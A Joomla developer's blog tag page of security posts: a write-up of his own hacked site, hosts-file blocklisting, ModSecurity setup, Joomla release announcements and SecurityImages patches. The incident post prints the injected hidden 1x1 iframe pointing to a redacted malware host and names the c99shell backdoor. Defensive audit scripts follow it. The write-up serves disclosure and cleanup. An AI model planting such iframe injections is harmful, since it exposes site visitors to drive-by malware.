security

Security is the degree of resistance to, or protection from, harm. It applies to any vulnerable and valuable asset, such as a person, dwelling, community, nation, or organization. [read more at http://en.wikipedia.org/wiki/Security]

  •  It all started with an email

    Trojan-Downloader.VBS.Agent
    From: Enrique MONTECRISTO
    Sent: Mon 6/18/07 10:04 PM
       
    Hello Cedric,
    When I browse your website with Firefox, I get this kind of warning from my GDATA antivirus shield :
    http://www.gdata.de/trade/GB/productview/727/16
    ---------------------------
    Virus: Trojan-Downloader.VBS.Agent.u
    Adress: stat1count.net
    ----------------------------
    Virus: Trojan-Downloader.JS.Agent.fq
    Address: stat1count.net
    ----------------------------
    Is it a fake ?

    The "virus" Trojan-Downloader.JS looks like a malicious inline JavaScript somewhere in my homepage.
    Thanks to the Firefox Web Developer toolbar (View all JavaScript), it was quite easy to locate the malicious script.

    The hacker had inserted 2 strange lines into my content. He had tampered with:


    index.php
    // displays queries performed for page
    if ($mosConfig_debug) {
        echo $database->_ticker . ' queries executed';
        echo '<pre>';
        foreach ($database->_log as $k=>$sql) {
            echo $k+1 . "\n" . $sql . '<hr />';
        }
        echo '</pre>';
    }
    doGzip();
    ?>

    <iframe width='1' height='1' border='0' frameborder='0' src='http://xxxx.info/stds/go.php?sid=3'></iframe>

    AND /index2.php

    <html xmlns="http://www.w3.org/1999/xhtml">
            <head>
                <?php echo $mainframe->getHead(); ?>
                <link rel="stylesheet" href="templates/<?php echo $cur_template;?>/css/template_css.css" type="text/css" />
                <link rel="shortcut icon" href="<?php echo $mosConfig_live_site; ?>/images/favicon.ico" />
                <meta http-equiv="Content-Type" content="text/html; <?php echo _ISO; ?>" />
                <meta name="robots" content="noindex, nofollow" />
                <?php if ($my->id || $mainframe->get( 'joomlaJavascript' )) { ?>
                <script language="JavaScript" src="<?php echo $mosConfig_live_site;?>/includes/js/joomla.javascript.js" type="text/javascript"></script>
                <?php } ?>
            </head>
            <body class="contentpane">
               <iframe width='1' height='1' border='0' frameborder='0' src='http://xxxxx.info/stds/go.php?sid=3'></iframe>
                <?php mosMainBody(); ?>
            </body>
        </html>
        <?php


    Which got replaced at runtime with
    http://xxx.info/stds/pages/default.php
    http://xxxxxxx.info/c/2380/counter21.php

    (xxxxx.info: I don't want to give this hacker publicity by publishing his server URL here.)

    How to find all potentially infected places?

    This returns a list of all files, with their path (-H), that contain the substring xxxxx:

    # find . -type f  -exec grep -H xxxxx {} \;

    How did I get infected?

    It seems that the hacker used my demo site at demo.waltercedric.com to copy an image onto the server, or to replace an existing one that had bad user rights.
    It may be an image like runme.php.jpg; this image then bootstraps and loads a hacker tool, c99shell (also known as PHP/C99Shell.A or Backdoor.PHP.C99Shell.c).

    PHP/C99Shell-A is a backdoor Trojan for platforms with PHP support, such as web servers. PHP/C99Shell-A listens for commands from a remote user.

    How to avoid that next time

    No file in the Apache root should have more than r--r--r-- rights, so here is a small script that you can put in crontab or save for periodic checks. It automatically changes all files to read-only for owner, group and other:

    # find . -type f ! -perm 444 -exec chmod a=r {} \;

    (! -perm 444 selects every file whose mode is not already exactly r--r--r--.)

    Joomla! applies the CHMOD automatically when it saves a file, but not to all files in the structure.

    Avoid any setuid/setgid files in your Apache root. This lists them:

    # find . -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \;
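The checks from this post, collected into one audit script as an added example (not the author's own code): it looks for hidden 1x1 iframes, double-extension uploads such as runme.php.jpg, PHP inside image files, and files with more than r--r--r--. The function names, the example.invalid URLs and the sample tree are constructed for illustration.

```sh
#!/bin/sh
# Added example: audit a web root for the tampering signs described above.

# Files carrying a 1x1 (or 0x0) iframe like the one appended to index.php.
find_hidden_iframes() {
    grep -rlEi "<iframe[^>]*(width|height)=['\"]?[01]['\"[:space:]>]" "$1" 2>/dev/null | sort
}

# Uploads with an inner .php extension, such as runme.php.jpg.
find_double_extension() {
    find "$1" -type f \( -iname '*.php.*' -o -iname '*.phtml.*' \) | sort
}

# Image files that contain a PHP open tag.
find_php_in_images() {
    find "$1" -type f \( -iname '*.jpg' -o -iname '*.jpeg' -o -iname '*.gif' \
        -o -iname '*.png' \) -exec grep -laF '<?php' {} + 2>/dev/null | sort
}

# Files with more than r--r--r--: any write or execute bit, setuid or setgid.
find_loose_permissions() {
    find "$1" -type f \( -perm -0200 -o -perm -0020 -o -perm -0002 \
        -o -perm -0100 -o -perm -0010 -o -perm -0001 \
        -o -perm -4000 -o -perm -2000 \) | sort
}

# Full report, one finding per line, prefixed with the check that raised it.
audit_webroot() {
    find_hidden_iframes "$1"    | sed 's/^/HIDDEN-IFRAME  /'
    find_double_extension "$1"  | sed 's/^/DOUBLE-EXT     /'
    find_php_in_images "$1"     | sed 's/^/PHP-IN-IMAGE   /'
    find_loose_permissions "$1" | sed 's/^/LOOSE-PERMS    /'
}

# Constructed sample tree (not taken from the original site); prints its path.
make_demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/images"
    printf '%s\n' '<?php doGzip(); ?>' \
        "<iframe width='1' height='1' frameborder='0' src='http://example.invalid/go.php?sid=3'></iframe>" \
        > "$d/index.php"
    printf '%s\n' '<?php mosMainBody(); ?>' \
        "<iframe width='560' height='315' src='http://example.invalid/video'></iframe>" \
        > "$d/clean.php"
    printf '%s' 'GIF89a<?php /* constructed marker, no payload */ ?>' > "$d/images/runme.php.jpg"
    printf '%s' 'GIF89a' > "$d/images/logo.gif"
    chmod 444 "$d/clean.php" "$d/images/logo.gif"
    chmod 600 "$d/index.php"
    chmod 644 "$d/images/runme.php.jpg"
    printf '%s\n' "$d"
}

# With no argument, run against the constructed tree; otherwise audit "$1".
if [ -n "${1:-}" ]; then
    audit_webroot "$1"
else
    demo=$(make_demo_tree) && audit_webroot "$demo"
    rm -rf "$demo"
fi
```

A visible iframe (560x315 in the sample) is not reported, and a file already at mode 444 does not appear under LOOSE-PERMS.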

    Note:


  • The hosts file is a computer file used by an operating system to map hostnames to IP addresses. This method is one of several methods used by an operating system to locate network nodes on a computer network. Spybot Search and Destroy uses this technique behind the scenes when you click on the Immunize button.

    Found at http://someonewhocares.org/hosts/

    Use this file to prevent your computer from connecting to selected internet hosts. This is an easy and effective way to

    • protects you from many types of spyware,
    • reduces bandwidth use,
    • blocks certain pop-up traps,
    • prevents user tracking by way of "web bugs" embedded in spam,
    • provides partial protection to IE from certain web-based exploits
    • blocks most advertising you would otherwise be subjected to on the internet.

    There is a version of this file that uses 0.0.0.0 instead of 127.0.0.1 available at http://someonewhocares.org/hosts/zero/. On some machines this may run minutely faster, however the zero version may not be compatible with all systems.

    This file must be saved as a text file with no extension. (This means that the file name should be exactly as below, without a ".txt" appended.) Let me repeat, the file should be named "hosts" NOT "hosts.txt".

    For Windows 9x and ME

    place this file at "C:\Windows\hosts"

    For NT, Win2K and XP

    use "C:\windows\system32\drivers\etc\hosts" or "C:\winnt\system32\drivers\etc\hosts"

    For Linux, Unix, or OS X place this file at "/etc/hosts". You will require root access to do this. Saving this file to "~/hosts" will allow you to run something like "sudo cp ~/hosts /etc/hosts".

    Ubuntu

    Users who experience trouble with apt-get should consult http://ubuntuforums.org/archive/index.php/t-613521.html

    OS/2

    Copy the file to "%ETC%\HOSTS" and in the CONFIG.SYS file, ensure that the line "SET USE_HOSTS_FIRST=1" is included.

    BeOS / Zeta / Haiku

    Place it at "/boot/beos/etc/hosts"

    Netware system

    The location is "System\etc\hosts"

    For Macintosh (pre OS X)

    Place it in the Mac System Folder or Preferences folder and reboot. (something like HD:System Folder:Preferences:Hosts)

    Alternatively you can save it elsewhere on your machine, then go to the TCP/IP control panel and click on "Select hosts file" to read it in. As well, note that the format is different on old Macs, so please visit http://someonewhocares.org/hosts/mac/ for the Mac format.

    If there is a domain name you would rather never see, simply add a line that reads "127.0.0.1 machine.domain.tld". This will have the effect of redirecting any requests to that host to your own computer. For example, this will prevent your browser from downloading banner ads, or sending your information back to a company.
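An added example (not from someonewhocares.org or the original post) of working with such a file from the shell: it lists which names a hosts file sinkholes, checks a single name, and adds an entry only when it is missing. The function names and the sample file are constructed; stat1count.net is the domain from the antivirus warning quoted earlier on this page.

```sh
#!/bin/sh
# Added example: inspect and extend a hosts-format blocklist.

# Print every hostname the file maps to 127.0.0.1 or 0.0.0.0, lower-cased.
# Comments and Windows line endings are stripped first.
sinkholed_hosts() {
    awk '{ sub(/#.*/, ""); gsub(/\r/, "") }
         $1 == "127.0.0.1" || $1 == "0.0.0.0" {
             for (i = 2; i <= NF; i++)
                 if ($i != "localhost") print tolower($i)
         }' "$1" | sort -u
}

# Succeed if hostname $2 is sinkholed in hosts file $1 (exact, case-insensitive).
is_blocked() {
    sinkholed_hosts "$1" | grep -qxF "$(printf '%s' "$2" | tr '[:upper:]' '[:lower:]')"
}

# Append "127.0.0.1 <host>" unless the host is already blocked (idempotent).
block_host() {
    is_blocked "$1" "$2" && return 0
    # Start on a fresh line if the file does not end with a newline.
    if [ -s "$1" ] && [ -n "$(tail -c 1 "$1")" ]; then printf '\n' >> "$1"; fi
    printf '127.0.0.1 %s\n' "$2" >> "$1"
}

# Constructed sample file; prints its path.
make_demo_hosts() {
    f=$(mktemp) || return 1
    printf '%s\n' \
        '127.0.0.1 localhost' \
        '# 127.0.0.1 commented-out.example' \
        '127.0.0.1 ads.example tracker.example   # two names on one line' \
        '0.0.0.0 Zero.Example' \
        '192.0.2.10 intranet.example' > "$f"
    printf '%s\n' "$f"
}

demo=$(make_demo_hosts)
block_host "$demo" stat1count.net   # domain named in the antivirus warning
block_host "$demo" stat1count.net   # second call adds nothing
sinkholed_hosts "$demo"
rm -f "$demo"
```

Run it against a copy of the real file first; writing to /etc/hosts itself requires root, as noted above.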

  • ModSecurity™ is an open source intrusion detection and prevention engine for web applications (or a web application firewall). Operating as an Apache Web server module or standalone, the purpose of ModSecurity is to increase web application security, protecting web applications from known and unknown attacks. From http://www.modsecurity.org/

    You'll have to create a free account at https://bsn.breach.com to get the real link

    # cd
    # wget https://bsn.breach.com/downloads/t=5156aa8803d6f186cf38688be522a402/modsecurity-apache/modsecurity-apache_2.5.7.tar.gz
    # tar -zxvf modsecurity-apache_2.5.7.tar.gz
    # cd modsecurity-apache_2.5.7/apache2
    # ./configure
    # make

    Copy the library mod_security2.so to /usr/lib/apache2

    # cp /root/modsecurity-apache_2.5.7/apache2/.libs/mod_security2.so /usr/lib/apache2/mod_security2.so

    Then copy all the latest rules into the apache2/conf.d folder

    # cp -r /root/modsecurity-apache_2.5.7/rules /etc/apache2/conf.d/

    Copy the minimal configuration file into apache2/conf.d folder

    # cp /root/modsecurity-apache_2.5.7/modsecurity.conf-minimal /etc/apache2/conf.d/modsecurity2.conf

    Add this line at the top of modsecurity2.conf

    LoadModule security2_module /usr/lib/apache2/mod_security2.so

    Restart apache2 by executing

    # rcapache2 restart

    Verify proper operations by looking at log files

    # tail -f /var/log/apache2/modsec_debug_log

    Attention: this is my location for the log files!

    Change

    • audit log location line 191
    • debug log location line 285

    in /etc/apache2/conf.d/rules/modsecurity_crs_10_config.conf

  • Just in case I take too long to deliver a ready-to-use download: it takes about 5 minutes, but you need to understand basic PHP coding.

    1. Create a temporary directory c:\patch
    2. Copy an existing patch distribution under a new name
      For example, download Joomla_1.5.13-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip into c:\patch\ and copy it to c:\patch\Joomla_1.5.14-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip
    3. Download the latest full zip package of Joomla that the patch targets (here 1.5.14), so I download Joomla_1.5.14-Stable-Full_Package.zip and save it in the same directory c:\patch\
    4. Now download a free trial copy of Beyond Compare from www.scootersoftware.com and install this great application
    5. Select the 2 zip files, right-click and choose “compare”
    6. Now it is like a game: on the left side you have your patch, which needs to be updated with the latest Joomla! core changes. Edit every file present on the left and update the lines that are new or changed until you are finished. Luckily there are only 14 files to merge
    7. Test the result in a Joomla test instance.

    I do this for you at each release of Joomla!

  • Anybody using internet should really read this article. While targeted at windows users, most of the
    rules also apply to users of Linux and mac.

    "Security consultant Howard Fosdick has contributed the latest entry in the
    2008 OSNews Article Contest: a highly detailed examination of security and privacy on the
    Windows platform, and how to use free
    software tools and a little knowledge to protect your privacy online.
    Do you know that --

    • Windows secretly records all the web sites you've ever visited?
    • After you delete your Outlook emails and empty the Waste Basket, someone could still
      read your email?
    • After you delete a file and empty the Recycle Bin, the file still exists?
    • Your computer might run software that spies on you?
    • Your computer might be a bot, a slave computer waiting to perform tasks assigned
      by a remote master?
    • The web sites you visit might be able to compile a complete dossier of your online activities?
    • Microsoft Word and Excel documents contain secret keys that uniquely identify you? They also
      collect statistics telling anyone how long you spent working on them and when. "
  • An interesting article which also explains how to make the most of the query capabilities of the Google search engine. Note that Google has nothing to do with this security breach; their search engine is simply too efficient, and users are not clever enough to store all sensitive data in a cryptographic container like PGPdrive or TrueCrypt.

    Google is in many ways the most useful tool available to the bad guys, and the most dangerous Web site on the Internet for many, many thousands of individuals and organizations. Read more at SecurityFocus

    Google has been and will always be a valuable tool in my daily work, as it allows me to resolve a lot of developer problems in no time...

  •  

    Joomla! 1.0.9 is now available at www.joomla.org

    It is strongly recommended to upgrade to this version.  1.0.9 contains the following changes:

    • 12 Low Level Security Fixes
    • 160+ General bug fixes
    • Several Performance enhancements
    And one business day later (I've done my homework), I release:

    Joomla 1.0.9 support for SecurityImages
    these files are from the 1.0.9 distributions plus all changes required to support securityimages in

    • com_contact  "The contact Us section"
    • com_login for the login module
    • com_registration  all registration functions
    Please Note:
    1. this is a FTP patch!
    2. There is no way to deactivate securityimages in com_contact (other than deactivating securityimages sitewide)

    Do yourself a favor use the latest securityimages version 3.0.5 :-)
    Files are available at Joomla forge in file release and at www.waltercedric.com

  • From Joomla.org

    The Joomla Project announces the immediate availability of Joomla 1.5.10 [Wohmamni]. This is a security release and users are strongly encouraged to upgrade immediately.
    This release contains 66 bug fixes, one low-level security fix, and one moderate-level security fix. It has been 11 weeks since
    Joomla 1.5.9 was released on January 10, 2009. The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Click here to download Joomla 1.5.10 (Full package) »
    Click here to find an update package. »

    Statistics for the 1.5.10 release period:

    • Joomla 1.5.10 contains:
      • 68 issues fixed in SVN
      • 281 commits
    • Tracker activity resulted in a net decrease of 8 active issues:
      • 176 new reports
      • 133 closed
      • 68 fixed in SVN
    • At the time the 1.5.10 release was packaged, the tracker had 95 active issues:
      • 44 open
      • 40 confirmed
      • 11 pending
  • The Joomla Project announces the immediate availability of Joomla 1.5.11 [Vea]. This is a security release and users are strongly encouraged to upgrade immediately.
    This release contains 26 bug fixes, two moderate-level security fixes and one low-level security fix. It has been 11 weeks since Joomla 1.5.10 was released on March 28, 2009. The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Click here to download Joomla 1.5.11 (Full package) »
    Click here to find an update package. »

    Official post at www.joomla.org

    Patches for SecurityImages 5.x will follow in 20 minutes from now!

  • The Joomla Project announces the immediate availability of Joomla 1.5.13 [Wojmamni ama baji]. This is a security release and users are strongly encouraged to upgrade immediately.
    This release contains 26 bug fixes, two moderate-level security fixes and one low-level security fix. It has been 3 weeks since Joomla 1.5.12 was released on July 1, 2009. The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Statistics

    Statistics for the 1.5.13 release period:

    • Joomla 1.5.13 contains:
      • 7 issues fixed in SVN
      • 7 commits
    • Tracker activity resulted in a net increase of 42 active issues:
      • 68 new reports
      • 19 closed
      • 7 fixed in SVN
    • At the time the 1.5.13 release was packaged, the tracker had 188 active issues:
      • 89 open
      • 68 confirmed
      • 31 pending

    Read more HERE

  • The Joomla Project announces the immediate availability of Joomla 1.5.14 [Wojmamni ama naiki]. This release contains fixes for two material bugs that were introduced in version 1.5.13 and one low level security issue. Instead of waiting for a normal 6 to 8-week release cycle, this release is being made available to users now. It has been eight days since Joomla 1.5.13 was released on July 22, 2009.

    Statistics for the 1.5.14 release period:

    • Joomla 1.5.14 contains:
      • 2 issues fixed in SVN
      • 2 commits
    • Tracker activity resulted in a net increase of 14 active issues:
      • 28 new reports
      • 12 closed
      • 2 fixed in SVN
    • At the time the 1.5.14 release was packaged, the tracker had 202 active issues:
      • 99 open
      • 68 confirmed
      • 35 pending

    http://www.joomla.org/announcements/release-news/5244-joomla-1514-released.html

  • The Joomla Project announces the immediate availability of Joomla 1.5.15 [Wojmamni ama mamni]. It has been three months since Joomla 1.5.14 was released on July 30, 2009.

    The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Download

    Click here to download Joomla 1.5.15 (Full package) »
    Click here to find an update package. »
  • The Joomla Project announces the immediate availability of Joomla 1.5.9 [Vatani]. This is a security release and users are strongly encouraged to upgrade immediately.
    It has been around two months since Joomla 1.5.8 was released on November 10, 2008. The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Announcement and download here

    Unofficial Mirror download here

    Statistics for the 1.5.9 release period:

    • Joomla 1.5.9 contains:
      • 81 issues fixed in SVN
      • 55 commits
    • Tracker activity resulted in a net decrease of 1 active issue:
      • 169 new reports
      • 92 closed
      • 81 fixed in SVN
    • At the time the 1.5.9 release was packaged, the tracker had 113 active issues:
      • 63 open
      • 47 confirmed
      • 3 pending
  • I will be fully supporting Joomla! 1.7 and hopefully also be able to migrate my whole site from 1.5 to 1.6 to 1.7 in a row in the coming weeks (10 July - Joomla 1.7 GA released)

    I will in the coming days test all my extension against 1.7 and set up a demo site at http://demo-joomla-1.7.waltercedric.com/

    Note: I always recommend to all users asking for support to move away from Joomla! 1.0 and to use the latest versions of Joomla!

    Do not wait; regularly invest time in updating your Joomla! instead of migrating every 2 years.

    Do not alter the core files of Joomla!; updates will be a real pain then!

    Ask in Joomla! forums for help: there are ways of changing Joomla! behaviors without changing code by using extensions.

  • The Joomla! community is pleased to announce the immediate availability of Joomla! 1.5.10

    Since Joomla 1.5.10 is released...Here are the new patches for SecurityImages 5.1.1

    • Allow login views, login modules, register, lost password, lost user account and contact section to be
      protected by SecurityImages
    • Are for Joomla! 1.5.10 only and SecurityImages 5.1.0 or later
    • 14 files have been altered, mostly views, and com_contact/com_user controller, click on picture below
      for more details
    • Download file Joomla_1.5.10-Stable-Full_PackageForSecurityImages5.1.0_v01.01.00.zip (33kB) and
      overwrite file on your server
    • Go to Joomla! control panel and HIT at least SAVE configuration once, this will add a new boolean value
      (true or false) in Joomla! configuration for using SecurityImages

    DOWNLOAD HERE and stay up to date with the Joomla! 1.5 patches RSS feed

  • Only for SecurityImages 5.1.x and Joomla! 1.5.14

    Allow login views, login modules, register, lost password, lost user account and contact section to be
    protected by SecurityImages

    • Are for Joomla! 1.5.14 only and SecurityImages 5.1.x or later
    • 14 files have been altered, mostly views, and com_contact/com_user controller, click on picture below
      for more details
    • Download file Joomla_1.5.14-Stable-Full_PackageForSecurityImages5.1.x_v01.01.00.zip (33kB) and
      overwrite file on your server
    • Go to Joomla! control panel and HIT at least SAVE configuration once, this will add a new boolean value
      (true or false) in Joomla! configuration for using SecurityImages.
  • Only for SecurityImages 5.1.x and Joomla! 1.5.15

    Allow login views, login modules, register, lost password, lost user account and contact section to be
    protected by SecurityImages

    • Are for Joomla! 1.5.15 only and SecurityImages 5.1.x or later
    • 14 files have been altered, mostly views, and com_contact/com_user controller, click on picture below
      for more details
    • Download file Joomla_1.5.15-Stable-Full_PackageForSecurityImages5.1.x_v01.02.00.zip (33kB) and
      overwrite file on your server
    • Go to Joomla! control panel and HIT at least SAVE configuration once, this will add a new boolean value
      (true or false) in Joomla! configuration for using SecurityImages.
  • Joomla! 1.0.5 is now available on the forge for download here. This is a Bug and Security Release, which means it contains fixes for Security Vulnerabilities. It is highly recommended that you upgrade to this version.
  • Joomla! 1.0.8 [ Sunshade ] is now available as of Sunday 26th February 2006 07:00 UTC for download here.

    We Highly Recommend that you upgrade to this version. 

    1.0.8 contains the following work:

    • 37 Security Fixes
    • 70+ General bug fixes
    • Several Performance enhancements

    1.0.8 is available as a Full Package, which contains all Joomla! files and Patch Packages which contain only the files that have been changed by the Stability work conducted.

  • The Joomla Project is pleased to announce the immediate availability of Joomla 1.5.12 [Wojmamni Ama Woi]. This release contains a number of bug fixes and three moderate-level security fixes. It has been less than a month since Joomla 1.5.11 was released on June 3, 2009.

    This release marks an important milestone for the Joomla Project due to the upgrade of the PEAR library to the new BSD licensed version, which brings the codebase into full compliance with the GPL. In addition, this release contains an important upgrade to TinyMCE v 3.2.4.1.

    Statistics for the 1.5.12 release period:

    • Joomla 1.5.12 contains:
      • 25 issues fixed in SVN
      • 14 commits
    • Tracker activity resulted in a net decrease of 11 active issues:
      • 54 new reports
      • 74 closed
      • 25 fixed in SVN
    • At the time the 1.5.12 release was packaged, the tracker had 146 active issues:
      • 59 open
      • 60 confirmed
      • 27 pending
    Download

    NOTE: My personal mirror is also up to date

  • The Joomla Project announces the immediate availability of Joomla 1.5.16 [Wojmamni ama busani]. It has been about six months since Joomla 1.5.15 was released on November 4, 2009.

    IMPORTANT NOTE: There is a problem in the upgrade packages for version 1.5.16. Until this can be fixed, please upgrade using the full package file above. You can follow the same instructions as for the upgrade packages. Just use the full file instead of the version file. They will correct this situation as soon as possible.

    Statistics for the 1.5.16 release period:

    • Joomla 1.5.16 contains:
      • 48 issues fixed in SVN
      • 52 commits
    • Tracker activity resulted in a net increase of 83 active issues:
      • 224 new reports
      • 94 closed
      • 48 fixed in SVN
    • At the time the 1.5.16 release was packaged, the tracker had 303 active issues:
      • 169 open
      • 103 confirmed
      • 31 pending
  • The Joomla Project announces the immediate availability of Joomla 1.5.20 [senu takaa]. This is a security release that addresses issues with the Joomla 1.5.19 packages.  We recommend users upgrade immediately.

    The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Download

    Or from my personal http://mirror.waltercedric.com

  • From the official press release

    The Joomla Project announces the immediate availability of Joomla 1.5.22 [senu takaa ama woi]. This is a security release, and we recommend users upgrade immediately.

    The Development Working Group's goal is to continue to provide regular, frequent updates to the Joomla community.

    Download

    You can also download these files from my Unofficial Mirror of Joomla! files (nearly 1000 files with all versions of all Joomla! are available)

    http://mirror.waltercedric.com

  • PhotoFEED is a small content plugin for Joomla! 1.5 that allows you to inline a set of images from your favorite online gallery: Smugmug, Flickr, Picasa or any RSS feed in any article.

    You can see it running here in my Demo site.

    New version 1.5.0 is available!

    NEW:  use /media directory for resources
    NEW:  online documentation in administrator panel
    NEW:  plugin log data in debug mode at /logs/plg.photofeed.log.php; you can't point a browser to it, use FTP/SCP/Plesk/cPanel to read this file.
    NEW: demo mode

    Download PhotoFeed

    Documentation

    Use the forums for support, questions or submitting your ideas


  • http://www.securitypatterns.org/index.html